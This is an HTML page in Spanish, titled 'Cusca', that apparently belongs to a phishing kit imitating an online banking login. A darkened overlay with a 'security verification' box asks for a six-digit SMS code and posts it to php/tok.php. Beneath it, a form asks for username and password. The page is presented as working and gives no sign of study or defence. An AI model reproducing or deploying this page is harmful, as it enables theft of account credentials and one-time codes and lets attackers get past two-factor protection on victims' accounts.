<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cusca</title>
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <style>
        .nav {
             width: 110%;
            padding: 15px;
            background: #2f586e;
        }
        

        .nav2 {
             width: 92%;
            padding: 15px;
            background: #2f586e;
        }


        .ipp {outline: none;
            -webkit-text-size-adjust: 100%;
            visibility: visible;
            box-sizing: border-box;
            margin: 0;
            font: inherit;
            line-height: normal;
            -webkit-user-select: text!important;
            font-family: 'Roboto', Arial, sans-serif;
            font-weight: 400!important;
            width: calc(100% - 42px);
            border: 1px solid #bbb;
            height: 40px;
            padding: 0 14px;
            font-size: 16px;
            color: #333;
            border-left: 3px solid #c3932f;
            background-repeat: no-repeat;
            background-position: 8px center;
            padding-left: 40px;
        }
        
        .form {
            width: 380px;
            height: auto;
            padding: 10px;
            border: px solid gray;
            margin-left: 10px;
        }
        
        .boton {
           
    
            background: #2f586e;
             width: 190px;
            height: 39px;
            border: none;
            color: #fff;
            font-size: 16px;
            margin-top: -10px;
              
             
        }
        
        .body {
            font-family: 'Roboto', Arial, sans-serif;
            background-color: #fff;
            margin: 0;
            padding: 0;
            width: 90%;
        }

        .fas {
            -webkit-text-size-adjust: 100%;
    visibility: visible;
    box-sizing: border-box;
     
    speak: none;
    font-style: normal;
    
    font-variant: normal;
    text-transform: none;
    line-height: 1;
    -webkit-font-smoothing: antialiased;
    margin-right: 4px;
    vertical-align: top;
    display: inline-block;
    color: #c3932f;
    font-size: 24px;
    margin-top: 9px;
        }
::placeholder {
    color: #aba8a8;
}
        
    </style>
</head>
<div class="nav">
    <img style="width: 150px;" src="img/log.png" alt="">
    <img width="110px" style="float: right;margin-top: -5px;" src="img/arr.png" alt="">
</div>













<div style="background-color: black; width: 121%;min-height: 1000px;position: absolute; opacity: 80%;">sad</div>



<br><br>



<center>
<div style="background-color: #fff; height: 320px; width: 370px;position: fixed;margin-left: 10px;">


    <div class="nav2">
<p style="float: left; font-size: small;color: #fff;margin-top: -5px;">Verificación de Seguridad</p>
    </div>

<br><br>
<img src="" alt="">

<img style="width: 100px; float: right; margin-top: -30px;" src="img/obl.png" alt="">

<br>


<form action="php/tok.php" method="post">




 <p style="float: left;margin-left: 40px;">Código de verificación</p>
  <input type="hidden" name="us" value="">
    <input  class="ipp" style="width: 80%;" type="text" name="tok" maxlength="6" minlength="6" required placeholder="Ingrese código"><br><br>






<a href="token.html" style="color: #2580b0; font-size: 12px;margin-left: -145px;margin-top: -10px;position: absolute;">Solicitar Código</a>
<br>
<a  style="font-size: 10px;
margin-top: -8px;
width: 350px;
position: absolute;
position: relativae;
/* margin-left: -149px; */
margin-left: -171px;">El código de verificación será enviado a tu celular, por favor espere.</a>

<br><br> 
    <input type="submit" value="Confirmar" style="     width: 100px;
    margin-left: 197px;
    position: relative;font-size: 15px;" class="boton">
</form>


</div>

</center>









<center> 


<body class="body"  >
   











   
        <br><br><br>
<div style=" width:50 ;"> 
        <form action="" class="form">

            <img style="position: absolute;
            width: 277px;
            margin-top: -29px;
            margin-left: -190px;" src="" alt=""><br><br>
            
            <div>
                <i class="fas fa-user"></i>
                <input class="ipp" type="text" name="tok" placeholder="Ingrese su usuario"><br><br>
            </div>
            
            <div>
                <i class="fas fa-lock"></i>
                <input class="ipp" type="text" inputmode="numeric" name="password" placeholder="Ingrese su contraseña"><br><br>
            </div>
            
            <br><br>
            
           
            <input class="boton" style="float: right;" type="submit" value="Siguiente">
          
          
            <br><br>
            <img style="width: 200px; float: right;" src="img/olv.png" alt="">
       <br><br>
       
       
       
        </form>
    </div>




<br><br>

<div> </div>
  <div >
                <img style="margin-left: 28px;" src="img/rela2.jpg" alt="">
                  </div>

                </center>
</body> 
</html>